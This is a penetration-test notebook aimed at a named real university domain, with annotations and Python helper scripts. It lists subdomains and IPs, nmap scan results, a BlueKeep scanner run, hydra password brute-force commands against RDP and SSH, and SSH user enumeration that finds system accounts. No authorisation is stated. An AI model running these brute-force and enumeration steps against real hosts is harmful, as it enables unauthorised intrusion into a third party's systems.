Penetration test 1
date: 2024/5/31
target: shou.edu.cn
ping requests time out, yet the web page opens normally; the server most likely has a firewall rule that drops ICMP.
WHOIS query results (whois.domaintools.com)
- Name servers for the domain: DNS1.SHOU.EDU.CN and SDNS.SHOU.EDU.CN.
- Domain IP address: 202.121.64.9, located in Shanghai, China, belonging to the China Education and Research Network (CERNET).
- ASN: AS4538 ERX-CERNET-BKB, a CERNET network identifier.
Gather related hosts with theHarvester: theHarvester -d shou.edu.cn -b baidu
admissions.shou.edu.cn
cjxy.shou.edu.cn:202.121.64.50
cwc.shou.edu.cn:202.121.64.50
cxw.shou.edu.cn:202.121.64.50
dag.shou.edu.cn:202.121.64.50
ecampus.shou.edu.cn:202.121.66.152
eclass.shou.edu.cn:202.121.64.96
edf.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn
hadal.shou.edu.cn:202.121.64.50
hdkjy.shou.edu.cn
hdkjy.shou.edu.cn:202.121.64.50
hyxy.shou.edu.cn
hyxy.shou.edu.cn:202.121.64.50
ieo.shou.edu.cn:202.121.64.50
jcxt.shou.edu.cn:202.121.66.27
jgzj.shou.edu.cn:202.121.64.50
jgzj.shou.edu.cn
jmxy.shou.edu.cn:202.121.64.50
jmxy.shou.edu.cn
jwc.shou.edu.cn
jwzx.shou.edu.cn
kjqk.shou.edu.cn:202.121.64.50
library.shou.edu.cn:124.243.227.8, 140.210.88.45, 140.210.88.44, 124.243.227.9
lseofr.shou.edu.cn:202.121.64.50
lseofr.shou.edu.cn
rczp.shou.edu.cn:202.121.66.175
rsrc.shou.edu.cn:202.121.64.50
rsrc.shou.edu.cn
smxy.shou.edu.cn:202.121.64.50
spxy.shou.edu.cn:202.121.64.50
spxy.shou.edu.cn
st.shou.edu.cn:202.121.64.7
sthj.shou.edu.cn:202.121.64.50
tech.shou.edu.cn:202.121.64.50
tyb.shou.edu.cn:202.121.64.50
tyb.shou.edu.cn
uis.shou.edu.cn
urp.shou.edu.cn:202.121.66.188
wfxy.shou.edu.cn:202.121.64.50
www.shou.edu.cn:202.121.64.9
wyxy.shou.edu.cn
wyxy.shou.edu.cn:202.121.64.50
xjzx.shou.edu.cn
xszx.shou.edu.cn:202.121.64.50
xxgk.shou.edu.cn
xxgk.shou.edu.cn:202.121.64.50
yjs.shou.edu.cn:202.121.64.50
yjs.shou.edu.cn
yywz.shou.edu.cn:202.121.64.50
yz.shou.edu.cn:202.121.64.53
zcgs.shou.edu.cn
zsjy.shou.edu.cn:202.121.64.50
zzb.shou.edu.cn:202.121.64.50
IP extraction (the unique addresses from the list above, saved to ips.txt for nmap -iL)
202.121.64.50
202.121.66.152
202.121.64.96
202.121.66.27
202.121.64.7
202.121.66.175
202.121.66.188
202.121.64.9
124.243.227.8
140.210.88.45
140.210.88.44
124.243.227.9
202.121.64.53
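The deduplication above was done by hand. The following script is an added example (not part of the original notes) that does the same job on theHarvester's `host` / `host:ip, ip` lines: merge the bare and resolved entries for one hostname, validate each address, write a numerically sorted target list, and count how many names share one address, which is how you spot the shared web front end at 202.121.64.50. The embedded sample is a subset of the host list above.

```python
import ipaddress
from collections import defaultdict

# Sample lines copied from the theHarvester host list above; the full list
# has the same `host` or `host:ip[, ip...]` shape.
HARVESTER_HOSTS = """\
admissions.shou.edu.cn
cjxy.shou.edu.cn:202.121.64.50
cwc.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn:202.121.64.50
gcxy.shou.edu.cn
library.shou.edu.cn:124.243.227.8, 140.210.88.45, 140.210.88.44, 124.243.227.9
st.shou.edu.cn:202.121.64.7
www.shou.edu.cn:202.121.64.9
"""


def parse_hosts(text):
    """Map each hostname to the set of IPs theHarvester resolved for it.

    A host may appear twice (once bare, once with IPs); both forms merge into
    one entry. Tokens that are not valid IPv4/IPv6 addresses are ignored.
    """
    hosts = defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # Hostnames never contain ':', so the first one separates host from IPs.
        host, _, ips = line.partition(":")
        entry = hosts[host.strip().lower()]  # creates the entry even for bare hosts
        for tok in ips.split(","):
            tok = tok.strip()
            if not tok:
                continue
            try:
                entry.add(str(ipaddress.ip_address(tok)))
            except ValueError:
                continue  # not an address; theHarvester sometimes emits junk tokens
    return dict(hosts)


def unique_ips(hosts):
    """Deduplicated target list, sorted numerically (not lexically)."""
    seen = {ip for ips in hosts.values() for ip in ips}
    return sorted(seen, key=lambda s: (ipaddress.ip_address(s).version, ipaddress.ip_address(s)))


def hosts_per_ip(hosts):
    """How many names share each address: a high count means one server fronts many vhosts."""
    counts = defaultdict(int)
    for ips in hosts.values():
        for ip in ips:
            counts[ip] += 1
    return dict(counts)


def unresolved_hosts(hosts):
    """Names listed without an address; resolve these by hand before scanning."""
    return sorted(h for h, ips in hosts.items() if not ips)


if __name__ == "__main__":
    parsed = parse_hosts(HARVESTER_HOSTS)
    with open("ips.txt", "w") as fh:
        fh.write("\n".join(unique_ips(parsed)) + "\n")
    for ip, n in sorted(hosts_per_ip(parsed).items(), key=lambda kv: -kv[1]):
        print(f"{ip}\t{n} host(s)")
    print("unresolved:", unresolved_hosts(parsed))
```

Feed the full output to parse_hosts and the resulting ips.txt is the `-iL` input for the scans below; the hosts_per_ip counts tell you which addresses need per-vhost web testing rather than a single port scan.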
Port scan
Candidate commands:
nmap -iL ips.txt -sT -p 1-1000 -oN tcp_scan_results.txt
nmap -iL ips.txt -sU -p 1-1000 -oN udp_scan_results.txt
nmap -iL ips.txt -sT -p- -T4 --disable-arp-ping -oN tcp_scan_results.txt
nmap -iL ips.txt -sU -p- -T4 --disable-arp-ping -oN udp_scan_results.txt
For speed we use: nmap -iL targetip -sT -p 1-1000 -T4 --disable-arp-ping -oN tcp_scan_results.txt
Service/version detection on the same range (the results below carry a VERSION column, so they come from this -sV run): nmap -iL targetip -p 1-1000 -sV -oN scan_results.txt
Full-range scans, not run because they were too slow:
nmap -iL targetip -sT -p- -oN tcp_scan_results.txt  # all TCP ports on every IP
nmap -iL targetip -sU -p- -oN udp_scan_results.txt  # all UDP ports on every IP
Two caveats: --disable-arp-ping only affects hosts on the local Ethernet segment, so it does nothing for these remote targets; because the targets drop ICMP, -Pn is the flag that keeps nmap from skipping a host that does not answer its discovery probes. A full -sU -p- sweep of 13 hosts is impractical; -sU --top-ports 100 is the usual compromise.
Nmap scan report for 202.121.66.27
Host is up (0.089s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
443/tcp open ssl/https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for imap.shou.edu.cn (202.121.64.7)
Host is up (0.097s latency).
Not shown: 990 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
25/tcp open smtp?
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open ssl/https cmproxy
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap
995/tcp open ssl/pop3?
Nmap scan report for 202.121.66.175
Host is up (0.080s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh WeOnlyDo sshd 2.4.3 (protocol 2.0)
80/tcp open tcpwrapped
443/tcp open ssl/https
Nmap scan report for meet.shou.edu.cn (202.121.64.9)
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/http Apache httpd
Nmap scan report for 124.243.227.8
Host is up (0.050s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 140.210.88.45
Host is up (0.42s latency).
Not shown: 995 filtered tcp ports (no-response), 3 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 140.210.88.44
Host is up (0.064s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
Nmap scan report for 124.243.227.9
Host is up (0.076s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https?
Nmap scan report for yz.shou.edu.cn (202.121.64.53)
Host is up (1.3s latency).
Not shown: 739 filtered tcp ports (no-response), 258 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http?
443/tcp closed https
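Reading thirteen `-oN` reports by eye is error-prone, so here is an added example (my code, not part of the original notes) that parses nmap's normal output into per-host records and answers the questions the next sections ask: which hosts expose port 22, which expose 443, and which banners repeat across hosts. The embedded input is three of the reports above, copied verbatim; the parser accepts either `Nmap scan report for name (ip)` or the bare-IP form and tolerates the collapsed whitespace of the copy above as well as nmap's real column padding.

```python
import re
from collections import defaultdict

# Three of the -oN reports above, embedded so the parser runs offline.
NMAP_OUTPUT = """\
Nmap scan report for imap.shou.edu.cn (202.121.64.7)
Host is up (0.097s latency).
Not shown: 990 filtered tcp ports (no-response), 2 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
25/tcp open smtp?
80/tcp open http
110/tcp open pop3
143/tcp open imap
443/tcp open ssl/https cmproxy
465/tcp open ssl/smtp Postfix smtpd
993/tcp open ssl/imap
995/tcp open ssl/pop3?
Nmap scan report for 202.121.66.175
Host is up (0.080s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh WeOnlyDo sshd 2.4.3 (protocol 2.0)
80/tcp open tcpwrapped
443/tcp open ssl/https
Nmap scan report for yz.shou.edu.cn (202.121.64.53)
Host is up (1.3s latency).
Not shown: 739 filtered tcp ports (no-response), 258 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http?
443/tcp closed https
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip>[\d.]+)\)|(?P<bare>[\d.]+))$"
)
# "port/proto state service [version...]"; \s+ covers nmap's padding and collapsed spaces
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def parse_nmap_normal(text):
    """Return a list of {'ip', 'name', 'ports': [...]} dicts, one per host block."""
    reports = []
    current = None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = {"ip": m.group("ip") or m.group("bare"), "name": m.group("name"), "ports": []}
            reports.append(current)
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            current["ports"].append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "version": (m.group("version") or "").strip(),
            })
    return reports


def open_ports(report):
    """Port numbers nmap reported as open (closed/filtered entries are dropped)."""
    return [p["port"] for p in report["ports"] if p["state"] == "open"]


def hosts_with_open_port(reports, port):
    """IPs exposing the given port, in report order."""
    return [r["ip"] for r in reports if port in open_ports(r)]


def service_index(reports):
    """Map 'service version' -> [ip:port]; repeated keys mean the same build on several hosts."""
    idx = defaultdict(list)
    for r in reports:
        for p in r["ports"]:
            if p["state"] == "open":
                key = f'{p["service"]} {p["version"]}'.strip()
                idx[key].append(f'{r["ip"]}:{p["port"]}')
    return dict(idx)


if __name__ == "__main__":
    reports = parse_nmap_normal(NMAP_OUTPUT)
    for r in reports:
        print(r["ip"], r["name"] or "-", open_ports(r))
    print("ssh hosts:", hosts_with_open_port(reports, 22))
    for key, where in service_index(reports).items():
        print(f"{key!r}: {where}")
```

Run it on the whole scan_results.txt and the `service_index` output is the list of banners to check against vulnerability data, grouped so a finding on one build is applied to every host running it.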
3389 (port closed)
202.121.66.27
The 1-1000 TCP scan above does not cover 3389. With the port closed, nothing below can reach an RDP service, so the failures are expected.
Metasploit BlueKeep detection module:
msfconsole  # start
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  # load the BlueKeep scanner
set RHOSTS 202.121.66.27  # set the target
run  # run
Failed.
BlueKeep check with an Nmap NSE script: nmap -p 3389 --script rdp-vuln-ms12-020 202.121.66.27
rdp-vuln-ms12-020 checks a different RDP vulnerability (MS12-020, CVE-2012-0002); BlueKeep (CVE-2019-0708) needs its own script or tool.
Failed.
Brute force: hydra -t 1 -V -f -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt rdp://202.121.66.27
RDP brute force failed.
22
202.121.66.175
22/tcp open ssh WeOnlyDo sshd 2.4.3 (protocol 2.0)
202.121.64.53
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
- Check the SSH version, algorithms and host key: nmap -p 22 -sV --script=ssh2-enum-algos,ssh-hostkey,sshv1 202.121.64.53
- Brute force: hydra -l root -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://202.121.64.53
msfconsole
search ssh
use auxiliary/scanner/ssh/ssh_enumusers
set rhosts 202.121.64.53
set user_file /path/to/username.txt
run
Result:
[+] 202.121.64.53:22 - SSH - User 'adm' found
[!] No active DB -- Credential data will not be saved!
[+] 202.121.64.53:22 - SSH - User 'mysql' found
ssh_enumusers infers account existence from the server's malformed-packet or timing behaviour, so these are candidates rather than confirmed logins; 'adm' and 'mysql' are stock system accounts on common Linux distributions, which fits the OS guess that follows.
Default TTL values of common operating systems:
- Windows: 128
- Linux/Unix: 64
- Cisco: 255
202.121.64.53: linux
Nmap OS detection reports the target as device type WAP (Wireless Access Point) running embedded Linux, model Actiontec MI424WR-GEN3I.
cpe:/h:actiontec: the hardware CPE (Common Platform Enumeration) says the device is an Actiontec MI424WR-GEN3I.
cpe:/o:linux: the OS CPE says the device runs a Linux kernel.
Treat the hardware match with suspicion: OS fingerprinting needs clean responses, and this host had most ports filtered, 258 host-unreachable answers and 1.3 s latency in the scan above. A home router model is also hard to square with an OpenSSH 4.3 banner and the JSP login page served on port 80. The Linux kernel part is the only piece worth keeping.
202.121.66.27: windows
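The TTL table above is applied by reading a reply's TTL and picking the nearest default above it, which also yields the hop count. The script below is an added example (not from the original notes) that does this for both Linux (`ttl=`) and Windows (`TTL=`) ping reply formats and rejects out-of-range values; the reply lines and 203.0.113.x addresses are constructed for the demo, not captured from the targets (whose ICMP was filtered).

```python
import re

# Initial TTLs from the table above. The family is the common case, not a certainty:
# an administrator can change the default, and a NAT or proxy in the path resets it.
DEFAULT_TTLS = (
    (64, "Linux/Unix"),
    (128, "Windows"),
    (255, "Cisco / network device"),
)

# Matches the TTL field of Linux ("ttl=52") and Windows ("TTL=116") ping output.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def guess_initial_ttl(observed):
    """Return (initial_ttl, hops, os_family) for an observed TTL.

    The initial TTL is the smallest default >= observed; hops is how many
    routers decremented it on the way. Raises ValueError outside 1..255.
    """
    if not 1 <= observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for initial, family in DEFAULT_TTLS:
        if observed <= initial:
            return initial, initial - observed, family
    raise AssertionError("unreachable: 255 covers the whole valid range")


def ttl_from_ping(line):
    """Extract the TTL from one ping reply line, or None for timeouts and summaries."""
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def classify_ping_output(text):
    """(observed, initial, hops, family) for every reply line in a ping capture."""
    results = []
    for line in text.splitlines():
        ttl = ttl_from_ping(line)
        if ttl is not None:
            results.append((ttl,) + guess_initial_ttl(ttl))
    return results


# Constructed reply lines in Linux and Windows ping format (not captured from the targets).
SAMPLE_PING = """\
64 bytes from 203.0.113.10: icmp_seq=1 ttl=52 time=89.1 ms
Reply from 203.0.113.20: bytes=32 time=80ms TTL=116
64 bytes from 203.0.113.30: icmp_seq=1 ttl=243 time=12.0 ms
Request timed out.
"""

if __name__ == "__main__":
    for observed, initial, hops, family in classify_ping_output(SAMPLE_PING):
        print(f"ttl={observed:<3} initial={initial:<3} hops={hops:<2} -> {family}")
```

The hop count is a sanity check: a traceroute of roughly the same length supports the guess, while a hop count near 60 means the nearest default was probably wrong (a Windows host 63 hops away is far less likely than a Linux host with a non-default TTL).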
80
202.121.64.53: the name yz.shou.edu.cn opens in a browser and redirects to http://yz.shou.edu.cn/login.jsp; the bare IP does not open.
nmap -p 80 --script http-enum -d 202.121.64.53  # the responses show a redirect, so the scan finds nothing; -d only raises the debug level
This is name-based virtual hosting: the server picks the site from the Host header, and a request carrying the bare IP gets a different site or a redirect. nmap's http scripts build the Host header from the target name they were given, so scan by name (nmap -p 80 --script http-enum yz.shou.edu.cn) or pass --script-args http.host=yz.shou.edu.cn.
curl -v -L -H "Host: yz.shou.edu.cn" http://202.121.64.53
When -L follows the redirect, curl resolves yz.shou.edu.cn through DNS again; to keep every request pinned to this address use curl -v -L --resolve yz.shou.edu.cn:80:202.121.64.53 http://yz.shou.edu.cn/ instead.
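To see the Host-header dependence end to end without touching the target, here is an added example (my code, not from the original notes): a small local server that behaves like the vhost described above (redirects / to /login.jsp only when the Host header matches, answers 404 otherwise), and a probe that sends a request to an IP with an explicit Host header and follows redirects while staying pinned to that IP, which is what curl --resolve does. The hostname yz.example.edu and the loopback server are stand-ins, not the real site.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Stand-in for yz.shou.edu.cn in the constructed vhost below.
VHOST = "yz.example.edu"


class VHostHandler(BaseHTTPRequestHandler):
    """Name-based virtual hosting: the response depends on the Host header, not the IP."""

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0].lower()
        if host != VHOST:
            # Unknown name: the default site, which is all a bare-IP request ever sees.
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"default site\n")
        elif self.path == "/":
            self.send_response(302)
            self.send_header("Location", f"http://{VHOST}/login.jsp")
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"login form\n")

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the constructed vhost server on a random loopback port; returns (port, server)."""
    srv = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv


def probe(ip, port, host_header, path="/", max_redirects=5):
    """GET path from ip:port with an explicit Host header.

    Redirects are followed by taking the new hostname and path from Location
    but reconnecting to the same ip, so DNS never decides where we go.
    Returns (final_status, final_path, body).
    """
    for _ in range(max_redirects + 1):
        conn = http.client.HTTPConnection(ip, port, timeout=5)
        conn.request("GET", path, headers={"Host": host_header})
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
        location = resp.getheader("Location")
        conn.close()
        if resp.status in (301, 302, 303, 307, 308) and location:
            parts = urlsplit(location)
            host_header = parts.hostname or host_header
            path = parts.path or "/"
            continue
        return resp.status, path, body
    raise RuntimeError("too many redirects")


if __name__ == "__main__":
    port, srv = start_server()
    print("by IP:  ", probe("127.0.0.1", port, "127.0.0.1"))
    print("by name:", probe("127.0.0.1", port, VHOST))
    srv.shutdown()
```

Against a real host, call probe once per hostname that theHarvester mapped to the same address; hosts that share 202.121.64.50 will each return their own site only when asked for by name.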